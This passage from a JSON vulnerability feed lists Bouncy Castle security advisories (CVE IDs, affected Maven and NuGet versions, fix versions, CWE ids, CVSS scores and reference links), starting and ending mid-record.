"1.78.1" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4cx2-fc23-5wg6/GHSA-4cx2-fc23-5wg6.json" } }, { "package": { "name": "org.bouncycastle:bcpkix-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.44" }, { "fixed": "1.79" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77", "1.78", "1.78.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4cx2-fc23-5wg6/GHSA-4cx2-fc23-5wg6.json" } }, { "package": { "name": "org.bouncycastle:bcpkix-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.0.8" } ] } ], "versions": [ "1.0.0", "1.0.1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4cx2-fc23-5wg6/GHSA-4cx2-fc23-5wg6.json" } }, { "package": { "name": "org.bouncycastle:bcpkix-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.8" } ] } ], "versions": [ "2.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4cx2-fc23-5wg6/GHSA-4cx2-fc23-5wg6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8916" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/310b30a4fbf36d13f6cc201ffa7771715641e67e" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/ff444a479942d88de64004dc82c3ee32a9e9075a" }, 
{ "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902025%E2%80%908916" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2025-08-13T22:52:42Z", "nvd_published_at": "2025-08-13T10:15:27Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/S:P/R:U/RE:M/U:Amber" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2j2x-hx4g-2gf4", "published": "2018-10-18T17:43:55Z", "modified": "2025-09-12T20:13:20.576466Z", "aliases": [ "CVE-2016-1000344" ], "summary": "In Bouncy Castle JCE Provider the DHIES implementation allowed the use of ECB mode", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the DHIES implementation allowed the use of ECB mode. This mode is regarded as unsafe and support for it has been removed from the provider.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-2j2x-hx4g-2gf4/GHSA-2j2x-hx4g-2gf4.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-2j2x-hx4g-2gf4/GHSA-2j2x-hx4g-2gf4.json" } }, { "package": 
{ "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-2j2x-hx4g-2gf4/GHSA-2j2x-hx4g-2gf4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000344" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/9385b0ebd277724b167fe1d1456e3c112112be1f" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2j2x-hx4g-2gf4" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-1310" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:52:17Z", "nvd_published_at": "2018-06-04T21:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4446-656p-f54g", "published": "2018-10-17T16:23:12Z", "modified": "2025-05-12T21:48:36.833343Z", "aliases": [ "CVE-2018-1000613" ], "summary": "Deserialization of Untrusted Data in Bouncy castle", "details": "Legion of the Bouncy Castle Java Cryptography APIs starting in version 1.57 and prior to version 1.60 contains a CWE-470: Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in XMSS/XMSS^MT private key deserialization that can result in Deserializing an XMSS/XMSS^MT private key can result in the execution of 
unexpected code. This attack appear to be exploitable via A handcrafted private key can include references to unexpected classes which will be picked up from the class path for the executing application. \n\nThis vulnerability appears to have been fixed in 1.60 and later.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.57" }, { "fixed": "1.60" } ] } ], "versions": [ "1.57", "1.58", "1.59" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4446-656p-f54g/GHSA-4446-656p-f54g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000613" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/4092ede58da51af9a21e4825fbad0d9a3ef5a223#diff-2c06e2edef41db889ee14899e12bd574" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/cc9f91c41be67e88fca4e38f4872418448950fd9" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/cd98322b171b15b3f88c5ec871175147893c31e6#diff-148a6c098af0199192d6aede960f45dc" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-4446-656p-f54g" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190204-0003" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00011.html" } ], "database_specific": { "cwe_ids": [ "CWE-470", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:57:10Z", "nvd_published_at": "2018-07-09T20:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4mv7-cq75-3qjm", "published": "2018-10-17T16:27:50Z", "modified": "2025-09-12T20:11:53.388848Z", "aliases": [ "CVE-2015-7940" ], "summary": "Moderate severity vulnerability that affects org.bouncycastle:bcprov-jdk14 and org.bouncycastle:bcprov-jdk15", "details": "The Bouncy Castle Java library before 1.51 does not validate a point is within the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an \"invalid curve attack.\"", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.51" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4mv7-cq75-3qjm/GHSA-4mv7-cq75-3qjm.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ {
"type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.51" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4mv7-cq75-3qjm/GHSA-4mv7-cq75-3qjm.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.51" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4mv7-cq75-3qjm/GHSA-4mv7-cq75-3qjm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-7940" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-4mv7-cq75-3qjm" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/174915.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00012.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-2035.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-2036.html" }, { "type": "WEB", "url": "http://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html" }, { "type": "WEB", "url": "http://www.debian.org/security/2015/dsa-3417" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/10/22/7" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/10/22/9" }, { "type": "WEB", "url": 
"http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/79091" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1037036" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1037046" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1037053" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:58:37Z", "nvd_published_at": "2015-11-09T16:59:09Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-4vhj-98r6-424h", "published": "2018-10-17T16:23:26Z", "modified": "2025-09-12T20:11:46.340387Z", "aliases": [ "CVE-2016-1000338" ], "summary": "In Bouncy Castle JCE Provider it is possible to inject extra elements in the sequence making up the signature and still have it validate", "details": "In Bouncy Castle JCE Provider version 1.55 and earlier the DSA does not fully validate ASN.1 encoding of signature on verification. 
It is possible to inject extra elements in the sequence making up the signature and still have it validate, which in some cases may allow the introduction of 'invisible' data into a signed structure.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.38" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4vhj-98r6-424h/GHSA-4vhj-98r6-424h.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.38" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4vhj-98r6-424h/GHSA-4vhj-98r6-424h.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.38" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4vhj-98r6-424h/GHSA-4vhj-98r6-424h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000338" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/b0c3ce99d43d73a096268831d0d120ffc89eac7f#diff-3679f5a9d2b939d0d3ee1601a7774fb0" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231006-0011" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:59:18Z", "nvd_published_at": "2018-06-01T20:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6xx3-rg99-gc3p", "published": "2021-08-13T15:22:31Z", "modified": "2025-07-17T22:23:36.388813Z", "aliases": [ "CVE-2020-15522" ], "related": [ "CGA-3544-c7xc-jx43", "CGA-p736-f9r6-77r7" ], "summary": "Timing based private key exposure in Bouncy Castle", "details": "Bouncy Castle BC Java before 1.66, BC C# .NET before 1.8.7, BC-FJA before 1.0.2.1, BC before 1.66, BC-FNA before 1.0.1.1 have a timing issue within the EC math library that can expose information about the private key when an attacker is able to observe timing information for the generation of multiple deterministic ECDSA signatures.", "affected": [ { "package": { "name": "org.bouncycastle:bc-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bc-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.2.1" } ] } 
], "versions": [ "1.0.0", "1.0.1", "1.0.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.0.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": 
"pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.65.01" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.63", "1.64", "1.65" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "BouncyCastle", "ecosystem": "NuGet", "purl": "pkg:nuget/BouncyCastle" }, 
"ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.8.7" } ] } ], "versions": [ "1.7.0", "1.8.1", "1.8.2", "1.8.3", "1.8.3.1", "1.8.4", "1.8.5", "1.8.6", "1.8.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15522" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-csharp/wiki/CVE-2020-15522" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2020-15522" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210622-0007" }, { "type": "WEB", "url": "https://www.bouncycastle.org/releasenotes.html" } ], "database_specific": { "cwe_ids": [ "CWE-203", "CWE-362" ], "github_reviewed": true, "github_reviewed_at": "2021-05-21T17:50:36Z", "nvd_published_at": "2021-05-20T12:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-72m5-fvvv-55m6", "published": "2021-04-22T16:16:49Z", "modified": "2025-07-17T22:22:44.756584Z", "aliases": [ "CVE-2020-26939" ], "summary": "Observable Differences in Behavior to Error Inputs in Bouncy Castle", "details": "In Legion of the Bouncy Castle BC before 1.55 and BC-FJA before 1.0.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. 
Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bc-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bc-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.2" } ] } ], "versions": [ 
"1.0.0", "1.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26939" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/930f8b274c4f1f3a46e68b5441f1e7fadb57e8c1" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2020-26939" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e%40%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00007.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201202-0005" } ], "database_specific": { "cwe_ids": [ "CWE-203" ], "github_reviewed": true, "github_reviewed_at": "2021-04-20T16:59:30Z", "nvd_published_at": "2020-11-02T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": 